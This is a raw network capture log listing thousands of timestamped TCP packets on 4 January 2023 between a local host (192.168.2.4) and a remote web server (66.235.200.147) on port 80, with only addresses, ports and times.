Jan 4, 2023 16:47:38.942953110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943011999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943041086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943067074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943079948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943094969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943109035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943109035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943121910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943150043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943161011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943183899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943183899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943198919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943212986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943236113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943240881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943262100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943269014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943286896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943295002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943325996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943334103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943351984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943362951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943380117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943392992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943413973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943420887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943439960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943449020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943464994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943474054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943495989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943542004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943710089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943736076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943758965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943784952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943785906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943797112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943811893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943815947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943837881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943840027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943859100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943866014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943877935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943900108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943913937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943928003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943943977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.943953991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943979979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.943986893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944005966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944011927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944032907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944036961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944046021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944058895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944076061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944083929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944101095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944109917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944127083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944137096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944154978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944163084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944180012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944190025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944205999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944216013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944232941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944243908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944268942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944282055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944293022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944314957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944685936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944711924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944739103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944749117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944767952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944780111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944792986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944792986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944822073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944823027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944837093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944847107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944863081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944875002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944897890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944900036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944924116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.944928885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944956064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.944981098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945002079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945005894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945002079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945033073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945038080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945060015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945060968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945086002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945091963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945102930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945115089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945132017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945141077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945167065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945167065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945183992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945197105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945223093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945231915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945245981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945250988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945266962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945295095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945651054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945677042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945702076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945712090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945719004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945744038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945748091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945775032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945780039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945801020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945808887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945830107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945830107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945843935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945856094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945871115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945882082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945903063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945907116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945926905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945935011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945955992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945960045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.945982933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.945987940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946016073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946027994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946039915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946042061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946069002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946074009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946085930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946098089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946114063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946124077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946149111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946151972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946173906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946178913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946204901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946207047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946230888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946254969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946587086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946613073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946640015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946650028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946667910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946676970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946716070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946721077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946721077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946744919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946769953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946772099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946795940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946798086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946821928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946824074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946846008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946851015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946870089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946877956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946897984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946904898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946923971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946932077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946954012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.946959019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.946986914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947024107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947035074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947043896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947067022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947068930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947067976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947067976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947067976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947093964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947094917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947120905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947132111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947145939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947161913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947196960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947618961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947654009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947685957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947688103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947714090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947721004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947737932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947758913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947770119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947793961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947805882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947830915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947840929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947869062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947875977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947902918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947916031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947928905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947948933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947958946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.947974920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.947997093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.948009014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.948034048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.948043108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.948066950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.948080063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.948090076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.948137045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026089907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026135921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026160002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026187897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026213884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026243925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026268959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026294947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026299000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026299000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026321888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026299000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026349068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026375055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026401997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026401997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026426077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026401997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026401997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026453018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026479959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026505947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026531935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026556969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026537895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026537895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026537895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026537895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026582003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026609898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026634932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026659966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026664019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026684046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026664019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026664019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026664019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026664019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026730061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026755095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026778936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026801109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.026818991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026818991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026818991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026818991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026818991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026818991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.026846886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028198957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028223991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028244972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028264999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028285027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028301001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028304100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028326035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028331041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028346062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028354883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028366089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028373003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028393030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028402090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028414011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028433084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028455019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028461933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028481960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028491020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028512955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028520107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028546095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028558016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028568983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028574944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028594017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028601885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028623104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028629065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028649092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028656006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028678894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028681040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028702974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028708935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028729916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028734922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028760910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028764963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028790951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028791904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028803110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028819084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028846025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028858900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028873920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028891087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028891087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028903008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028930902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028956890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:39.028980970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:39.028981924 CET	80	49696	66.235.200.147	192.168.2.4
